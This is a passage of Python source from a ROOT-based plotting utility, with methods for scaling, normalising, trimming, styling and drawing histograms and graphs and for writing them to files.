xmin*0.1, xmax + xmax*0.1] def zoom_axis(self, which, xmin, xmax): try: sxmin = '{0:.10f}'.format(xmin) xminf = get_value(sxmin, float, 0.0) except: xminf = -1. try: sxmax = '{0:.10f}'.format(xmax) xmaxf = get_value(sxmax, float, 0.0) except: xmaxf = 1. ax = None for o in self.l: if which == 0: ax = o.obj.GetXaxis() #if xmax == None: # xlims = self.find_xlimits() # if xlims[0] != None: # self.zoom_axis(which, xlims[0], xlims[1]) if which == 1: ax = o.obj.GetYaxis() if which == 2: if o.obj.InheritsFrom('TH1'): ax = o.obj.GetZaxis() if ax: #print xmin,xmax ibmin = ax.FindBin(xminf) ibmax = ax.FindBin(xmaxf) #try: # #print 'ibmin, ibmax, nbins:',ibmin, ibmax, o.obj.GetNbinsX() # if ibmax > o.obj.GetNbinsX(): # ibmax = o.obj.GetNbinsX() # #print 'reset axis max to:',ibmax #except: # #print ibmin, ibmax # pass ##print xmin, xmax ax.SetRange(ibmin, ibmax) def scale_errors(self, val = 1.): for o in self.l: if o.obj.InheritsFrom('TH1') == False: continue for i in range(1, o.obj.GetNbinsX() + 1): err = o.obj.GetBinError(i) o.obj.SetBinError(i, err * val) def scale(self, val = 1.): for o in self.l: if o.obj.InheritsFrom('TH1') == False: continue if o.obj.GetSumw2() == None: o.obj.Sumw2() o.obj.Scale(val) #for i in range(1, o.GetNbinsX()): # err = o.GetBinError(i) # o.SetBinError(i, err * val) # v = o.GetBinContent(i) # o.SetBinContent(i, v * val) def scale_any(self, val = 1.): for o in self.l: if o.obj.InheritsFrom('TH1') == True: o.obj.Sumw2() o.obj.Scale(val) if o.obj.InheritsFrom('TGraph') == True: for i in range(o.obj.GetN()): o.obj.SetPoint(i, o.obj.GetX()[i], o.obj.GetY()[i] * val) if o.obj.InheritsFrom('TGraphErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEX()[i], o.obj.GetEY()[i] * val) if o.obj.InheritsFrom('TGraphAsymmErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEXlow()[i], o.obj.GetEXhigh()[i], o.obj.GetEYlow()[i] * val, o.obj.GetEYhigh()[i] * val) def scale_1ox_at_index(self, i=-1): if len(self.l) < 1: return o = self.l[i] if o.obj.InheritsFrom('TH1') == True: o.obj.Sumw2() #o.obj.Scale(val) print('[e] ::scale_1ox_at_index NOT implemented for histograms!') if o.obj.InheritsFrom('TGraph') == True: for i in range(o.obj.GetN()): if o.obj.GetX()[i] != 0: o.obj.SetPoint(i, o.obj.GetX()[i], o.obj.GetY()[i] / o.obj.GetX()[i]) if o.obj.InheritsFrom('TGraphErrors') == True: for i in range(o.obj.GetN()): if o.obj.GetX()[i] != 0: o.obj.SetPointError(i, o.obj.GetEX()[i], o.obj.GetEY()[i] / o.obj.GetX()[i]) if o.obj.InheritsFrom('TGraphAsymmErrors') == True: for i in range(o.obj.GetN()): if o.obj.GetX()[i] != 0: o.obj.SetPointError(i, o.obj.GetEXlow()[i], o.obj.GetEXhigh()[i], o.obj.GetEYlow()[i] / o.obj.GetX()[i], o.obj.GetEYhigh()[i] / o.obj.GetX()[i]) def scale_1ox_at_index_any(self): for i in range(len(self.l)): self.scale_1ox_at_index(i) def scale_1x_at_index(self, i=-1): if len(self.l) < 1: return o = self.l[i] if o.obj.InheritsFrom('TH1') == True: o.obj.Sumw2() #o.obj.Scale(val) print('[e] ::scale_1x_at_index NOT implemented for histograms!') if o.obj.InheritsFrom('TGraph') == True: for i in range(o.obj.GetN()): o.obj.SetPoint(i, o.obj.GetX()[i], o.obj.GetY()[i] * o.obj.GetX()[i]) if o.obj.InheritsFrom('TGraphErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEX()[i], o.obj.GetEY()[i] * o.obj.GetX()[i]) if o.obj.InheritsFrom('TGraphAsymmErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEXlow()[i], o.obj.GetEXhigh()[i], o.obj.GetEYlow()[i] * o.obj.GetX()[i], o.obj.GetEYhigh()[i] * o.obj.GetX()[i]) def scale_1x_at_index_any(self): for i in range(len(self.l)): self.scale_1x_at_index(i) def scale_at_index(self, i=-1, val = 1.): if len(self.l) < 1: return o = self.l[i] if o.obj.InheritsFrom('TH1') == True: o.obj.Sumw2() if val == 0: o.obj.Scale(1.0, "width") else: o.obj.Scale(val) if o.obj.InheritsFrom('TGraph') == True: for i in range(o.obj.GetN()): o.obj.SetPoint(i, o.obj.GetX()[i], o.obj.GetY()[i] * val) if o.obj.InheritsFrom('TGraphErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEX()[i], o.obj.GetEY()[i] * val) if o.obj.InheritsFrom('TGraphAsymmErrors') == True: for i in range(o.obj.GetN()): o.obj.SetPointError(i, o.obj.GetEXlow()[i], o.obj.GetEXhigh()[i], o.obj.GetEYlow()[i] * val, o.obj.GetEYhigh()[i] * val) def trim_graph_range(self, gr, xmin, xmax): n = gr.GetN() x = gr.GetX() if n < 1: return False if xmin == None: xmin = gr.GetX()[0] if xmax == None: xmin = gr.GetX()[n-1] for i in range(n): if (x[i] < xmin) or (x[i] > xmax): gr.RemovePoint(i) return self.trim_graph_range(gr, xmin, xmax) return False def trim_histogram_range(self, gr, xmin, xmax): ibmax = gr.GetNbinsX() + 1 if xmin == None: xmin = gr.GetBinLowEdge(1) if xmax == None: xmax = gr.GetBinCenter(ibmax) + gr.GetBinWidth(ibmax) for ibin in range(ibmax): xc = gr.GetBinCenter(ibin) if (xc < xmin) or (xc > xmax): gr.SetBinContent(ibin, 0.) gr.SetBinError(ibin, 0.) #gr.SetBinWeight(ibin, 0.) return False def trim_at_index(self, i=-1, xlow=None, xhigh=None): if len(self.l) < 1: return o = self.l[i] if o.obj.InheritsFrom('TH1') == True: self.trim_histogram_range(o.obj, xlow, xhigh) if o.obj.InheritsFrom('TGraph') == True: self.trim_graph_range(o.obj, xlow, xhigh) if o.obj.InheritsFrom('TF1') == True: o.obj.SetRange(xlow, xhigh) def flatten_at_index(self, i=-1, val=None): if len(self.l) < 1: return o = self.l[i] print('flatten', o.obj.GetName(), val) if o.obj.InheritsFrom('TH2') and val is not None: h = o.obj if not h.GetSumw2(): h.Sumw2() for ibx in range(1, h.GetXaxis().GetNbins() + 1): for iby in range(1, h.GetYaxis().GetNbins() + 1): if h.GetBinContent(ibx, iby) != 0 or h.GetBinError(ibx, iby) > 0: h.SetBinContent(ibx, iby, val) h.SetBinError(ibx, iby, 0.0) else: print('flatten implemented only for TH2') def rebin(self, val = 2, norm = False): for o in self.l: if o.obj.InheritsFrom('TH1') == False: continue if not o.obj.GetSumw2(): o.obj.Sumw2() o.obj.Rebin(val) if norm == True: o.obj.Scale(1./(val*1.)) def adjust_pad_margins(self, _left=0.17, _right=0.05, _top=0.1, _bottom=0.17+0.03): du.adjust_pad_margins(_left, _right, _top, _bottom) def adjust_axis_attributes(self, which, title_size=-1, label_size = -1, title_offset=-1): ax = None for o in self.l: if which == 0: ax = o.obj.GetXaxis() if which == 1: ax = o.obj.GetYaxis() if which == 2: if o.obj.InheritsFrom('TH1'): ax = o.obj.GetZaxis() if ax: if title_offset != -1: self.axis_title_offset[which] = title_offset if title_size != -1: self.axis_title_size[which] = title_size if label_size != -1: self.axis_label_size[which] = label_size ax.SetTitleFont (self.font) ax.SetTitleOffset(self.axis_title_offset[which]) ax.SetTitleSize (self.axis_title_size[which]) ax.SetLabelFont (self.font) ax.SetLabelSize (self.axis_label_size[which]) ax.SetLabelOffset(self.axis_label_offset[which]) def adjust_to_pad(self, pad): if pad == self.pad: #print '[i] nothing to adjust:',pad, self.pad return xfactor = pad.GetAbsWNDC() / self.pad.GetAbsWNDC() yfactor = pad.GetAbsHNDC() / self.pad.GetAbsHNDC() #print '::adjust_to_pad',xfactor, yfactor i = 0 new_size_t = self.axis_title_size[i] * yfactor new_size_l = self.axis_label_size[i] * yfactor new_size_to = self.axis_title_offset[i] * yfactor self.adjust_axis_attributes(i, new_size_t, new_size_l, new_size_to) i = 1 new_size_t = self.axis_title_size[i] * xfactor new_size_l = self.axis_label_size[i] * xfactor new_size_to = self.axis_title_offset[i] * xfactor self.adjust_axis_attributes(i, new_size_t, new_size_l, new_size_to) self.update() def _process_dopts(self, i): o = self.l[i] if o.dopt.hidden: kolor = 0 o.obj.SetFillColor(kolor) o.obj.SetFillColorAlpha(kolor, 0.0) o.obj.SetLineColor(kolor) o.obj.SetLineColorAlpha(kolor, 0.0) o.obj.SetMarkerColor(kolor) o.obj.SetMarkerColorAlpha(kolor, 0) o.obj.SetFillStyle(1001) o.obj.SetMarkerColor(kolor) o.obj.SetMarkerSize(-1) o.obj.SetMarkerStyle(-1) return #line if o.dopt.lstyle > 0: o.obj.SetLineStyle(o.dopt.lstyle) else: if o.dopt.use_line: kline = -1 if o.dopt.last_line: if i > 0: kline = self.l[i-1].obj.GetLineStyle() if kline < 0: kline = self.style.next_line() o.dopt.lstyle = kline o.obj.SetLineStyle(kline) #width if o.dopt.lwidth > 0: o.obj.SetLineWidth(o.dopt.lwidth) #marker if o.dopt.pstyle > 0: o.obj.SetMarkerStyle(o.dopt.pstyle) else: if o.dopt.use_marker: o.obj.SetMarkerStyle(self.style.next_marker()) mscale = 1. #if o.obj.GetMarkerStyle() >= 27 and o.obj.GetMarkerStyle() != 28: mscale = 1.4 if o.obj.GetMarkerStyle() >= 27: mscale = 1.4 o.obj.SetMarkerSize(o.dopt.psize * mscale) #fill if o.dopt.fstyle > 0: o.obj.SetFillStyle(o.dopt.fstyle) else: o.obj.SetFillStyle(0000) o.obj.SetFillColor(0) #kolor kolor = -1 if o.dopt.kolor > 0: kolor = o.dopt.kolor else: if o.dopt.last_kolor: if i > 0: kolor = self.l[i-1].dopt.kolor if kolor < 0: kolor = self.style.next_color() o.dopt.kolor = kolor o.obj.SetFillColor(kolor) o.obj.SetLineColor(kolor) o.obj.SetMarkerColor(kolor) alpha = 1.0 if o.dopt.alpha > 0: alpha = o.dopt.alpha/100. o.obj.SetFillColorAlpha(kolor, alpha) o.obj.SetLineColorAlpha(kolor, alpha) o.obj.SetMarkerColorAlpha(kolor, alpha) def _process_serror_dopts(self, i): o = self.l[i] #errx = ROOT.gStyle.GetErrorX() #ROOT.gStyle.SetErrorX(0.5) #ROOT.gStyle.SetErrorX(errx) o.obj.SetMarkerColor(0) o.obj.SetMarkerSize(-1) o.obj.SetMarkerStyle(0) #line if o.dopt.lstyle > 0: o.obj.SetLineStyle(o.dopt.lstyle) #width if o.dopt.lwidth > 0: o.obj.SetLineWidth(o.dopt.lwidth) #kolor kolor = -1 if o.dopt.kolor > 0: kolor = o.dopt.kolor else: if o.dopt.last_kolor: if i > 0: kolor = self.l[i-1].dopt.kolor if kolor < 0: kolor = 7 o.dopt.kolor = kolor alpha = 0.3 if o.dopt.alpha > 0: alpha = o.dopt.alpha/100. o.obj.SetFillColor(kolor) o.obj.SetLineColor(kolor) if o.dopt.rectangle == True: newalpha = alpha * 2. if newalpha > 1.0: newalpha = 1.0 o.obj.SetLineColorAlpha(kolor, newalpha) else: o.obj.SetLineColorAlpha(kolor, alpha) o.obj.SetMarkerColor(kolor) o.obj.SetMarkerColorAlpha(kolor, 0) if o.dopt.rectangle == True: o.obj.SetFillColorAlpha(kolor, alpha) o.obj.SetFillStyle(0000) else: o.obj.SetFillColorAlpha(kolor, alpha) o.obj.SetFillStyle(1001) def has2D(self): has2D = False for i,o in enumerate(self.l): if o.obj.IsA().InheritsFrom('TH2') == True: has2D = True if o.obj.IsA().InheritsFrom('TF2') == True: has2D = True return has2D def has_overlay(self): for o in self.l: if o.dopt.overlay: return True return False def draw(self, option='', miny=None, maxy=None, logy=False, colopt='', adjust_pad=True, adjust_axis_attributes=True): if self.has2D() == False: if miny == -1 and maxy == -1: pass else: self.adjust_maxima(miny=miny, maxy=maxy, logy=logy) if adjust_axis_attributes == True: self.adjust_axis_attributes(0) self.adjust_axis_attributes(1) self.adjust_axis_attributes(2) drawn = False #gdopt = draw_option(option) unused! self.style.reset() if self.has2D(): #self.tcanvas = ROOT.gPad if not self.tcanvas: print('[i] 2D draw - making canvas here') if len(self.l) > 8: self.make_canvas(1000, 800) else: self.make_canvas() if self.has_overlay: self.tcanvas = du.make_canvas_grid(len(self.l), self.tcanvas) if self.tcanvas != None: tcname = self.tcanvas.GetName() else: tcname = 'used only in 2D case' for i,o in enumerate(self.l): for _exec in o.exec: # try: import importlib _mod_name, _meth_name = _exec.rsplit('.', 1) if _mod_name[:2] == './': sys.path.append(os.getcwd()) _mod_name = _mod_name[2:] print('[i] attempting to import', _mod_name) _module = importlib.import_module(_mod_name) print('[i] trying to get method', _meth_name, 'from', _module) _meth = getattr(_module, _meth_name) _meth(cobj=o, hl=self) #except: # print('[w] failed to exec',_meth_name, 'from', _mod_name, 'on', self.last_ds.hname, ' - command in', self.last_ds.fname) # pass for i,o in enumerate(self.l): if o.dopt.shift != 0: if o.obj.InheritsFrom('TGraph'): #print 'TGraph shifting...',o.dopt.shift tu.shift_graph(o.obj, o.dopt.shift) if o.obj.InheritsFrom('TH1'): #print 'TH1 shifting...',o.dopt.shift o.obj = tu.graph_from_h(o.obj, o.dopt.shift) o.dopt.shift = 0.0 self.debug('::draw ' + o.name + ' ' + o.dopt.stripped()) if o.dopt.is_error == False: self._process_dopts(i) #errors extra_opt = [] extra_opt.append(option) if o.dopt.is_error: extra_opt.append('E2') self._process_serror_dopts(i) if self.has2D(): if self.has_overlay: if o.obj.InheritsFrom('TH2') or o.obj.InheritsFrom('TF2'): # ROOT.gStyle.SetOptTitle(False) # True if len(o.dopt.stripped()) > 0: o.obj.Draw(o.dopt.stripped()) #print o.obj.GetName(),o.dopt.stripped() else: o.obj.Draw('colz') ROOT.gPad.SetToolTipText(o.obj.GetTitle(), 100) self.adjust_pad_margins(_right=0.17) else: o.draw('same '.join(extra_opt)) else: #tc = ROOT.gROOT.FindObject(tcname) #tc.cd(i+1) self.tcanvas.cd(i+1) ROOT.gStyle.SetOptTitle(False) # True if len(o.dopt.stripped()) > 0: o.obj.Draw(o.dopt.stripped()) #print o.obj.GetName(),o.dopt.stripped() else: o.obj.Draw('colz') ROOT.gPad.SetToolTipText(o.obj.GetTitle(), 100) self.adjust_pad_margins(_right=0.17) else: o.draw(' '.join(extra_opt)) if gDebug: dbgu.debug_obj(o.dopt) if adjust_pad == True and self.has2D() == False: self.adjust_pad_margins() self.update() self.pad_name = ROOT.gPad.GetName() # name is better self.pad = self.get_pad_drawn() if self.pad: self.debug('[i] ' + self.name + ' drawing on ' + str(self.pad)) def draw_bare(self, option=''): for i,o in enumerate(self.l): o.obj.Draw(option) def set_log_multipad(self, axes='', flag=True): l = self.tcanvas.GetListOfPrimitives() # print self.tcanvas.GetName(), len(l) # changed becaus of #logX 1 did not work? for i in range(len(l) + 1): tp = self.tcanvas.cd(i) if tp: if 'z' in axes: tp.SetLogz(flag) if 'y' in axes: tp.SetLogy(flag) if 'x' in axes: tp.SetLogx(flag) def set_grid_multipad(self, axes='', flag=True): l = self.tcanvas.GetListOfPrimitives() for i in range(len(l)): tp = self.tcanvas.cd(i+1) if tp: if 'y' in axes: tp.SetGridy(flag) if 'x' in axes: tp.SetGridx(flag) def get_pad_drawn(self): self.pad = ROOT.gROOT.FindObject(self.pad_name) if not self.pad: self.pad = None return self.pad def self_legend(self, ncols = 1, title='', x1=None, y1=None, x2=None, y2=None, tx_size=None, option='brNDC'): self.empty_legend(ncols, title, x1, y1, x2, y2, tx_size, option) if self.has2D() and self.force_legend is False: self.update() return self.legend for o in self.l: if not self.is_selected(o): continue if o.dopt.no_legend: continue #opt = o.dopt.stripped() opt = o.dopt.legend_option() self.debug('::self_legend legend entry with opt: {0} {1}'.format(opt,o.obj.GetTitle()) ) #self.legend.AddEntry(o.obj, o.obj.GetTitle(), opt) self.legend.AddEntry(o.obj, o.user_title, opt) self.legend.Draw() self.update() return self.legend def draw_legend(self, ncols = 1, title='', x1=None, y1=None, x2=None, y2=None, tx_size=None, option='brNDC'): print('[w] obsolete call to draw_legend use self_legend instead...') self.self_legend(ncols, title, x1, y1, x2, y2, tx_size, option) def empty_legend(self, ncols, title='', x1=None, y1=None, x2=None, y2=None, tx_size=None, option='brNDC'): if x1==None: x1 = 0.2 # 0.6 # was 0.3 # was 0.5 if y1==None: y1 = 0.67 #0.67 #0.7 #was 0.67 if x2==None: x2 = 0.92 # 0.8 #0.88 if y2==None: y2 = 0.87 #0.88 #used also 0.9 option = option + ' #l' self.legend = ROOT.TLegend(x1, y1, x2, y2, '', option) if len(title) > 0: self.legend.SetHeader(title) self.legend.SetNColumns(ncols) self.legend.SetBorderSize(0) fkolor = ROOT.kWhite if '+k' in option: try: fkolor = int(option.split('+k')[1].split(' ')[0]) except: fkolor = ROOT.kWhite self.legend.SetFillColor(fkolor) self.legend.SetFillStyle(1001) if '+a' in option: try: salpha = option.split('+a')[1].split(' ')[0] salpha = get_value(salpha, float, 100.)/100. except: salpha = 0 self.legend.SetFillColorAlpha(fkolor, salpha) else: if fkolor == ROOT.kWhite: self.legend.SetFillColorAlpha(fkolor, 0.66) else: self.legend.SetFillColorAlpha(fkolor, 0.10) self.legend.SetTextAlign(12) self.legend.SetTextFont(self.font) self.legend.SetTextColor(1) #if tx_size!=None: # if self.font == 42: # #tx_size=self.axis_title_size[0] # _tx_size = self.axis_title_size[0] * 0.8 * tx_size #0.045 # if self.font == 43: # _tx_size = 14 * tx_size # print tx_size,self.font # self.legend.SetTextSize(_tx_size) #else: # print self.axis_title_size[0] * 0.5 self.legend.SetTextSize(self.axis_title_size[0] * 0.5) # was 0.5 if tx_size!=None: self.legend.SetTextSize(tx_size) self.legend.SetToolTipText('#legend') return self.legend def update(self, logy=False): if self.pad: if logy: self.pad.SetLogy() self.pad.Modified() self.pad.Update() if self.tcanvas: l = self.tcanvas.GetListOfPrimitives() for i in range(len(l)): tp = self.tcanvas.cd(i+1) if tp: tp.Update() if logy: tp.SetLogy() self.tcanvas.Modified() self.tcanvas.Update() def make_canvas(self, w=600, h=400, split=0, orientation=0, name=None, title=None): #print 'make_canvas called' if self.tcanvas==None: if name == None: name = self.name + '-canvas' if title == None: title = self.name + '-canvas' name = pyutils.to_file_name(name) self.tcanvas = ROOT.TCanvas(name, title, w, h) print('[i] making canvas', self.tcanvas.GetName()) self.tcanvas.cd() if split > 0: du.split_gPad(split, orientation) tu.gList.append(self.tcanvas) return self.tcanvas def destroy_canvas(self): if self.tcanvas != None: self.tcanvas.Destructor() self.tcanvas = None def resize_window(self, w, h): self.tcanvas.SetWindowSize(w, h) # + (w - self.tcanvas.GetWw()), h + (h - self.tcanvas.GetWh())); self.tcanvas.SetWindowSize(w + (w - self.tcanvas.GetWw()), h + (h - self.tcanvas.GetWh())); self.tcanvas.Update() def scale_by_binwidth(self, modifYtitle = True): for h in self.l: if h.obj.InheritsFrom('TH1'): if h.obj.GetSumw2() == None: h.obj.Sumw2() if h.obj.GetBinWidth(1) == h.obj.GetBinWidth(2): bw = h.obj.GetBinWidth(1) if modifYtitle == True: newytitle = h.obj.GetYaxis().GetTitle() + ' / {}'.format(bw) h.obj.GetYaxis().SetTitle(newytitle) h.obj.Scale(1./bw) else: for ib in range(1, h.obj.GetNbinsX() + 1): v = h.obj.GetBinContent(ib) v = v / h.obj.GetBinWidth(ib) ve = h.obj.GetBinError(ib) ve = ve / h.obj.GetBinWidth(ib) h.obj.SetBinContent(ib, v) h.obj.SetBinError(ib, ve) if modifYtitle == True: newytitle = h.obj.GetYaxis().GetTitle() + ' / {}'.format('BW') h.obj.GetYaxis().SetTitle(newytitle) else: print('[w] normalize not defined for non histogram...') def normalize_self(self, scale_by_binwidth = True, modTitle = False, scaleE = False, to_max=False): for h in self.l: if h.obj.InheritsFrom('TH3'): print('[w] normalize_self not implemented for TH3') if h.obj.InheritsFrom('TH1'): #if h.GetSumw2() == None: h.obj.Sumw2() if to_max == True: intg = h.obj.GetMaximum() else: if h.obj.InheritsFrom('TH2') or h.obj.InheritsFrom('TF2'): intg = h.obj.Integral(1, h.obj.GetNbinsX(), 1, h.obj.GetNbinsY()) else: intg = h.obj.Integral(1, h.obj.GetNbinsX()) if h.obj.InheritsFrom('TH2') or h.obj.InheritsFrom('TF2'): if scale_by_binwidth: print('[w] bin width for 2D histogram set to 1.') bw = 1. else: bw = h.obj.GetBinWidth(1) if intg > 0: if scale_by_binwidth: h.obj.Scale(1./intg/bw) if scaleE == True: scale_errors(h.obj, 1./intg/bw) print('[i] scale by:',1./intg/bw) else: h.obj.Scale(1./intg) if scaleE == True: scale_errors(h.obj, 1./intg) print('[i] scale by:',1./intg) if modTitle == True: ytitle = h.obj.GetYaxis().GetTitle() ytitle += ' ({0})'.format(bw) h.obj.GetYaxis().SetTitle(ytitle) else: print('[w] normalize not defined for non histogram...') def normalize_to_index(self, idx, scale_by_binwidth = True, modTitle = False, scaleE = False, to_max=False): intg = 0 try: if to_max == True: intg = self.l[idx].obj.GetMaximum() else: intg = self.l[idx].obj.Integral() except: print('[w] normalization to',idx,'failed') return print('[i] normalization defined by index=',idx,'intg=',intg) for h in self.l: if h.obj.InheritsFrom('TH1'): #if h.GetSumw2() == None: h.obj.Sumw2() bw = h.obj.GetBinWidth(1) if intg > 0: if scale_by_binwidth: h.obj.Scale(1./intg/bw) if scaleE == True: scale_errors(h.obj, 1./intg/bw) print('[i] scale by:',1./intg/bw) else: h.obj.Scale(1./intg) if scaleE == True: scale_errors(h.obj, 1./intg) print('[i] scale by:',1./intg) if modTitle == True: ytitle = h.obj.GetYaxis().GetTitle() ytitle += ' ({0})'.format(bw) h.obj.GetYaxis().SetTitle(ytitle) else: print('[w] normalize not defined for non histogram...') def write_to_file(self, fname=None, opt='RECREATE', name_mod=''): if fname==None: fname = './' + pyutils.to_file_name(self.name) + '.root' if check_andor_make_output_dir(fname, isfilename=True) is False: print('[e] unable to create/access output dir for: ', fname, file=sys.stderr) return try: f = ROOT.TFile(fname, opt) f.cd() except: print('[e] unable to open file:',fname, file=sys.stderr) return for i,h in enumerate(self.l): newname = h.obj.GetName() if 'mod:' in name_mod or 'modn:' in name_mod: smod = name_mod.replace('mod:', '') smod = name_mod.replace('modn:', '') if len(smod) > 0: newname = self.name + '-{}-'.format(i) + smod else: if 'modn:' in name_mod: newname = 'o_{}'.format(i) else: newname = self.name + '-{}'.format(i) else: if len(name_mod)>0: if ':' == name_mod[-1]: newname = name_mod.replace(':','') + '_{}'.format(i) else: newname = h.obj.GetName() + name_mod if h.dopt.no_legend: newname = newname + '_noleg' if h.dopt.hidden: newname = newname + '_hidden' h.obj.Write(newname) # except: # print >> sys.stderr, '[e] unable to write object:',h.obj.GetName() try: f.Close() print('[i] written to file',fname) except: print('[e] writing to file {0} failed'.format(fname), file=sys.stderr) def ratio_to(self, ito = 0, opt='HIST'): hdenom = self.l[ito].obj hret = dlist('{}-ratio-to-index-{}'.format(self.name, ito)) for i in range(len(self.l)): if i == ito: continue h = self.l[i].obj hlr = make_ratio(h, hdenom) hret.add(hlr.last().obj, hlr.last().obj.GetTitle(), opt) return hret def ratio_to_graph(self, ito = 0, opt='p'): hdenom = self.l[ito].obj hret = dlist('{}-ratio-to-index-{}'.format(self.name, ito)) for i in range(len(self.l)): if i == ito: continue h = self.l[i].obj hlr = ROOT.TGraphAsymmErrors(h, hdenom) hret.add(hlr, h.GetTitle()+'_div_'+hdenom.GetTitle(), opt) return hret def ratio_to_href(self, hdenom, opt='HIST'): hret = dlist('{}-ratio-to-href-{}'.format(self.name, hdenom.GetName())) for i in range(len(self.l)): h = self.l[i].obj hlr = make_ratio(h, hdenom) hret.add(hlr.last().obj, hlr.last().obj.GetTitle(), opt) return hret def reset_titles(self, stitles): for h in self.l: i = self.l.index(h) if i < len(stitles): h.obj.SetTitle(stitles[i]) def reset_user_titles(self, stitles): for h in self.l: i = self.l.index(h) if i < len(stitles): h.user_title = stitles[i] def draw_comment(self, comment = '', font_size=None, x1 = 0.0, y1 = 0.9, x2 = 0.99, y2 = 0.99, rotation=0.0): du.draw_comment(comment, font_size, x1, y1, x2, y2, rotation) def sum(self, scales=None): reth = None isummed = 0 for i,h in enumerate(self.l): if h.dopt.hidden or h.obj.GetTitle() == 'fake': continue if isummed == 0: reth = draw_object(h.obj, self.name + '-sum', h.name + '-sum') if scales != None: reth.obj.Scale(scales[i]) isummed += 1 continue scale = 1. if scales != None: scale = scales[i] if reth.obj.InheritsFrom('TGraph') or h.obj.InheritsFrom('TGraph'): add_graphs(reth.obj, h.obj) isummed += 1 else: reth.obj.Add(h.obj, scale) isummed += 1 return reth def set_name_as_filename(self, name): self.name = pyutils.to_file_name(name) def pdf(self): self.tcanvas.Print(pyutils.to_file_name(self.name)+'.pdf','.pdf') if dlist.enable_eps: self.tcanvas.Print(pyutils.to_file_name(self.name)+'.eps','.eps') def pdf_to_file(self, fname): self.tcanvas.Print(fname,'pdf') def png(self): self.tcanvas.Print(pyutils.to_file_name(self.name)+'.png','.png') def add_graphs(o1, o2, w=1.): print('[w] do not trust add_graphs with errors...') if o1.InheritsFrom('TGraph') and o2.InheritsFrom('TGraph'): x = o1.GetX() y = o1.GetY() for i in range(o1.GetN()): if o1.InheritsFrom('TGraphErrors'): xe = o1.GetEX()[i] ye = o1.GetEY()[i] fractionE = ye / y[i] if x[i] == o2.GetX()[i]: y[i] = y[i] - o2.GetY[i] print('simple substr..') else: y[i] = y[i] + w * o2.Eval(x[i], 0, 'S') if o1.InheritsFrom('TGraphErrors'): ye = y[i] * fractionE o1.SetPoint(i, x[i], y[i]) if o1.InheritsFrom('TGraphErrors'): o1.SetPointError(i, xe, ye) def divide_graphs(o1, o2, w=1.): print('[w] do not trust add_graphs with errors...') if o1.InheritsFrom('TGraph') and o2.InheritsFrom('TGraph'): x = o1.GetX() y = o1.GetY() for i in range(o1.GetN()): try: y[i] = y[i] / (w * o2.Eval(x[i], 0, 'S')) except: y[i] = 0. try: o1.GetEY()[i] = o1.GetEY()[i] / (w * o2.Eval(x[i], 0, 'S')) except: pass class ListStorage: def __init__(self, name = None): if name == None: name = 'global_debug_list_of_lists' self.name = name self.name = tu.unique_name(name) tu.gList.append(self) self.lists = [] self.tcanvas = None self.lx1 = None self.lx2 = None self.ly1 = None self.ly2 = None self.legend_font_scale = 1. def __getitem__(self, i): return self.lists[i] def reset_axis_titles(self, titlex=None, titley=None, titlez=None): for hl in self.lists: hl.reset_axis_titles(titlex, titley, titlez) def add_to_list(self, lname, obj, title, dopt): hl = self.get(lname) hl.add(obj, title, dopt) def add_from_file(self, lname, hname, fname, htitle, dopt): hl = self.get(lname) return hl.add_from_file(hname, fname, htitle, dopt) def get(self, lname): for l in self.lists: if lname == l.name: return l retl = dlist(lname) self.lists.append(retl) return self.get(lname) def get_list(self, lname): return self.get(lname) def zoom_axis(self, which, xmin, xmax): for l in self.lists: l.zoom_axis(which, xmin, xmax) self.update() def append(self, hl): self.lists.append(hl) def prepend(self, hl): self.lists.insert(0, hl) def legend_position(self, x1=None, y1=None, x2=None, y2=None): self.lx1 = x1 self.lx2 = x2 self.ly1 = y1 self.ly2 = y2 def resize_window(self, w, h): self.tcanvas.SetWindowSize(w, h) # + (w - self.tcanvas.GetWw()), h + (h - self.tcanvas.GetWh())); self.tcanvas.SetWindowSize(w + (w - self.tcanvas.GetWw()), h + (h - self.tcanvas.GetWh())); self.tcanvas.Update() def fix_x_range(self, xmin, xmax): for l in self.lists: l.fix_x_range(xmin, xmax) #print l def draw_all(self, option='', miny=None, maxy=None, logy=False, colopt='', legtitle='', orient=0, condense=False, draw_legend=True): legoption = 'brNDC' if len(self.lists) <= 0: return if condense == False: self.tcanvas = du.make_canvas_grid(len(self.lists), None, self.name+'-canvas', self.name, orient=orient) else: tmptc = ROOT.TCanvas('tc-'+self.name, 'tc-'+self.name) self.tcanvas = pcanvas.pcanvas(tmptc, len(self.lists)) legoption = 'br' for i,l in enumerate(self.lists): if legtitle == '': slegtitle = l.title else: slegtitle = legtitle if legtitle == None: slegtitle = '' if ';single_pad' in legtitle: slegtitle = legtitle slegtitle = slegtitle.replace(';single_pad', '') if i > 0: slegtitle = ' ' self.tcanvas.cd(i+1) if condense == True: l.set_font(43, 1.4) if condense == False: l.draw(logy=logy, option=option, miny=miny, maxy=maxy, colopt=colopt) else: l.draw(logy=logy, option=option, miny=miny, maxy=maxy, colopt=colopt, adjust_pad=False) if draw_legend: if self.lx1 != None: legend = l.self_legend(1, slegtitle, self.lx1, self.ly1, self.lx2, self.ly2, tx_size=self.legend_font_scale * 0.04, option=legoption) else: legend = l.self_legend(ncols=1, title=slegtitle, tx_size=self.legend_font_scale * 0.04, option=legoption) else: if legtitle == 'self': l.draw_comment(l.title, 0.05, 0, 0.9, 1., 1.) l.update(logy=logy) self.adjust_pads() def draw_mpad(self, miny=None, maxy=None, logy=False, legtitle = []): ncol = 1 nrow = 1 while ncol * nrow < len(self.lists): if ncol * nrow < len(self.lists): ncol = ncol + 1 if ncol * nrow < len(self.lists): nrow = nrow + 1 remap = [] for n in range(ncol * nrow): if n < ncol: remap.append(n*2+1) else: remap.append((n-ncol)*2) print(remap) import canvas2 tcname = '{}-canvas-condensed'.format(self.name) self.tcanvas = canvas2.CanvasSplit(tcname, ncol, nrow, None, int(850*1.2), int(600*1.2)) for i in range(len(self.lists)): hl = self.lists[i] hl.set_font(42) tp = self.tcanvas.cd(remap[i]) self.tcanvas.adjust_axis(hl, scaleTSize=1.2, scaleLSize=1.2) hl.draw(logy=True, miny=miny,maxy=maxy,adjust_pad=False, adjust_axis_attributes=False) tp.SetLogy(logy) xf = self.tcanvas.get_axis_factor(0) yf = 